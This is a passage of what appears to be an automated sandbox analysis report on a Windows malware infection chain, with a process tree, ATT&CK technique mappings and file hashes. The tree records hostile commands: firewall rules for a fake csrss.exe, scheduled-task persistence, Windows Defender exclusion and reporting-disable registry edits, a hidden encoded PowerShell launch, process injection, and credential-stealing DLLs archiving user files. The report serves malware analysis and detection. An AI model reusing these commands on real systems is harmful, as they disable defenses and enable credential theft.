- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:652 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 652 -s 5446⤵
- Program crash
PID:5068
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 652 -s 5406⤵
- Program crash
PID:4500
-
-
-
-
C:\Users\Admin\Pictures\9YnX9TIPmfCMcUr7DOBqr4ym.exe"C:\Users\Admin\Pictures\9YnX9TIPmfCMcUr7DOBqr4ym.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1936 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:132
-
-
C:\Users\Admin\Pictures\9YnX9TIPmfCMcUr7DOBqr4ym.exe"C:\Users\Admin\Pictures\9YnX9TIPmfCMcUr7DOBqr4ym.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3880 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:780 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:4792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵PID:4708
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
PID:2360
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2780
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5720
-
-
-
-
C:\Users\Admin\Pictures\YqnYErQDqyvWk0WfwDMsdpx4.exe"C:\Users\Admin\Pictures\YqnYErQDqyvWk0WfwDMsdpx4.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3356 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4876
-
-
C:\Users\Admin\Pictures\YqnYErQDqyvWk0WfwDMsdpx4.exe"C:\Users\Admin\Pictures\YqnYErQDqyvWk0WfwDMsdpx4.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2800 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4820
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵PID:404
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
PID:1504
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4152
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5280
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5560 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1092
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
PID:1548
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f7⤵PID:5852
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5820
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:5720
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll7⤵
- Executes dropped EXE
PID:5312
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F7⤵
- Creates scheduled task(s)
PID:3700
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"7⤵PID:5272
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵PID:5984
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)9⤵
- Launches sc.exe
PID:5164
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\CT7SLFhM3W2nqplaBtJ10Bf4.exe"C:\Users\Admin\Pictures\CT7SLFhM3W2nqplaBtJ10Bf4.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4792 -
C:\Users\Admin\AppData\Local\Temp\syncUpd.exeC:\Users\Admin\AppData\Local\Temp\syncUpd.exe5⤵
- Executes dropped EXE
PID:3584 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3584 -s 13566⤵
- Program crash
PID:2780
-
-
-
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exeC:\Users\Admin\AppData\Local\Temp\BroomSetup.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2688 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "6⤵PID:2768
-
C:\Windows\SysWOW64\chcp.comchcp 12517⤵PID:2732
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F7⤵
- Creates scheduled task(s)
PID:4276
-
-
-
-
-
C:\Users\Admin\Pictures\MWqP5e651UE727D9aFjdApYi.exe"C:\Users\Admin\Pictures\MWqP5e651UE727D9aFjdApYi.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3272
-
-
C:\Users\Admin\Pictures\BOWXpT9EMatm7T8qv30PJ1Fe.exe"C:\Users\Admin\Pictures\BOWXpT9EMatm7T8qv30PJ1Fe.exe" --silent --allusers=04⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
PID:4224 -
C:\Users\Admin\Pictures\BOWXpT9EMatm7T8qv30PJ1Fe.exeC:\Users\Admin\Pictures\BOWXpT9EMatm7T8qv30PJ1Fe.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.29 --initial-client-data=0x300,0x304,0x308,0x2dc,0x30c,0x6e9721f8,0x6e972204,0x6e9722105⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1544
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\BOWXpT9EMatm7T8qv30PJ1Fe.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\BOWXpT9EMatm7T8qv30PJ1Fe.exe" --version5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4756
-
-
C:\Users\Admin\Pictures\BOWXpT9EMatm7T8qv30PJ1Fe.exe"C:\Users\Admin\Pictures\BOWXpT9EMatm7T8qv30PJ1Fe.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4224 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240321125130" --session-guid=5044f51c-e85e-4ba6-877a-92a02c40085f --server-tracking-blob=ZDg4NjQzYWExMDdmNjk0OTRmM2YzZjdiZDc3NWZhYzQ5Njg1MThmZjE4ODY3ZmQzMThkYzc0OTdlZWFmZTRkOTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjExIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcxMTAyNTQ3NC4yOTI3IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiJlY2FlZjA0MC1lMGRjLTQ2ZjctOWY4ZS00NGE5OWUwMTcwMjkifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=38050000000000005⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
PID:3124 -
C:\Users\Admin\Pictures\BOWXpT9EMatm7T8qv30PJ1Fe.exeC:\Users\Admin\Pictures\BOWXpT9EMatm7T8qv30PJ1Fe.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.29 --initial-client-data=0x310,0x314,0x318,0x2e0,0x31c,0x6d9221f8,0x6d922204,0x6d9222106⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1836
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403211251301\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403211251301\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"5⤵
- Executes dropped EXE
PID:3280
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403211251301\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403211251301\assistant\assistant_installer.exe" --version5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6076 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403211251301\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403211251301\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x284,0x288,0x28c,0x260,0x290,0x830040,0x83004c,0x8300586⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5932
-
-
-
-
C:\Users\Admin\Pictures\9Z26EcBsLLBcqwnDFb4WtGQK.exe"C:\Users\Admin\Pictures\9Z26EcBsLLBcqwnDFb4WtGQK.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3168 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2768
-
-
C:\Users\Admin\Pictures\9Z26EcBsLLBcqwnDFb4WtGQK.exe"C:\Users\Admin\Pictures\9Z26EcBsLLBcqwnDFb4WtGQK.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
PID:6024 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5296
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵PID:5980
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
PID:3624
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4540
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2556
-
-
-
-
C:\Users\Admin\Pictures\BLHU0RlzPVoO4o5n4SRKk03P.exe"C:\Users\Admin\Pictures\BLHU0RlzPVoO4o5n4SRKk03P.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4952 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Suspicious use of AdjustPrivilegeToken
PID:404
-
-
C:\Users\Admin\Pictures\BLHU0RlzPVoO4o5n4SRKk03P.exe"C:\Users\Admin\Pictures\BLHU0RlzPVoO4o5n4SRKk03P.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
PID:5936 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1260
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"6⤵PID:5140
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes7⤵
- Modifies Windows Firewall
PID:5956
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2808
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:6124
-
-
-
-
C:\Users\Admin\Pictures\VEfRE0FVJNYHI28gmqs3eJxU.exe"C:\Users\Admin\Pictures\VEfRE0FVJNYHI28gmqs3eJxU.exe"4⤵
- Executes dropped EXE
PID:2632 -
C:\Users\Admin\AppData\Local\Temp\7zS58F8.tmp\Install.exe.\Install.exe5⤵
- Executes dropped EXE
PID:1136 -
C:\Users\Admin\AppData\Local\Temp\7zS5B89.tmp\Install.exe.\Install.exe /igvdidk "385118" /S6⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
PID:4964 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"7⤵PID:5228
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&8⤵PID:5436
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:329⤵PID:5528
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:649⤵PID:5640
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"7⤵PID:5260
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&8⤵PID:5412
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:329⤵PID:5580
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:649⤵PID:5664
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gBggYHUYG" /SC once /ST 07:06:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="7⤵
- Creates scheduled task(s)
PID:6076
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gBggYHUYG"7⤵PID:5196
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gBggYHUYG"7⤵PID:5428
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bNoYxGgNiGReyhFIfY" /SC once /ST 12:53:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qeOxabDhDvCCKUygJ\MfJxEgkARsuSvOa\PwJHubF.exe\" Qp /VLsite_idMfq 385118 /S" /V1 /F7⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5536 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:5528
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main2⤵
- Loads dropped DLL
PID:4048 -
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4332 -
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵PID:3368
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\594324687199_Desktop.zip' -CompressionLevel Optimal4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1016
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main2⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:4032
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 652 -ip 6521⤵PID:4704
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 652 -ip 6521⤵PID:3676
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 3648 -ip 36481⤵PID:2400
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious use of AdjustPrivilegeToken
PID:880 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:5288
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1196
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:5680
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:5544
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2736 -ip 27361⤵PID:4916
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵PID:2996
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3584 -ip 35841⤵PID:5284
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
2Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
2Credential Access
Unsecured Credentials
5Credentials In Files
4Credentials in Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
11KB
MD5a33e5b189842c5867f46566bdbf7a095
SHA1e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA2565abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b
-
Filesize
593KB
MD5c8fd9be83bc728cc04beffafc2907fe9
SHA195ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040
-
Filesize
1.6MB
MD5374af175b0dc499a088a0921abb4c272
SHA1ef66406d06da2f65ef2788a536722e7b5b11e2d0
SHA2567e280075c14b38eea0d2c9200a693f185d4b26a6b92a23e10b478c8cdd7bbb4f
SHA5124535421072e5fea5192ef46cbc8de8c8fd0f7c8da9157916a1703086b2de381a6818906e842d94738f3e32f409d598bbad4d9c0dacc24d026726c8e8bb4db1dc
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
2KB
MD5d0c46cad6c0778401e21910bd6b56b70
SHA17be418951ea96326aca445b8dfe449b2bfa0dca6
SHA2569600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02
SHA512057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949
-
Filesize
19KB
MD5ab9c37cb1a4fa4355b3d6fa3c2913660
SHA1a7dd4accc3a63dea5dba1d36de80bedc6d338b6d
SHA25662170dcbf929e84b5c3914eb9411b088a836e7ca30c2eeeeb283207645997b65
SHA51223502c32876fb8ec77c9f3072118abf1604b4fc06cc11aa4decb7c248151a21034d5723e6165c8282b957e856c665dabdbbd8f1cc16087f97ae6eea3a55c4715
-
Filesize
944B
MD539f275549f523222efba91bbfeedd021
SHA17e48c021b1e7b7c81b9a3b6b5cc1b220606e5731
SHA256a0072f885bdd0063b2415b0aa78d2228348ead9a89b307032cbba01894d5f3cd
SHA5123a0495982e447b14574f565c4756e4fe8a853543d5c791755f04de805f956f8a16109712a71b309d7ff4cd8385bffcbb40fceb054f59b7d742d7d9ed776d44f8
-
Filesize
1.6MB
MD534a269f08f154c89ba9bfca37fc444d0
SHA1504ff732538e854f6b838e6faca415ccc7112a33
SHA2560eda3288d1e63562290c07de9a904e3406308bd5222d3e1683315b7aff3d73db
SHA51268814391a4c697f63e46e02a5efbd773d3629d83f74b1d18d66647a293ac78bc3ee9ccc52aff256db83d4d212e66d85e04b4969918b5f073265f81cae67ce4fd
-
Filesize
1.7MB
MD5ef5204b462540ee5ca8a41ed7535ec8e
SHA141114a5b0ace1592d5fbc3dd063d78509533453f
SHA25646011a1e22c0df70c8d95a4d8f18cffbc68457076e79be32f79806a68d43a103
SHA512bfff5d251fc1dce161c3c161617a15586d976bb2ed74f4ec57063a77a3cb0a7ae2364a9f643ca5da0c50cbcdc9331a6cea0331ee7c6dc8a02aa5a1a0e9ec2182
-
Filesize
1024KB
MD59381d9dd262f8e5896fc22fc3d21717a
SHA1cf1f062386e39528ff924b58ae219fb787a66b55
SHA256a2e03b9badc13d860842c3ea9c128212c8917cb0101227966b75d5ae52d11d27
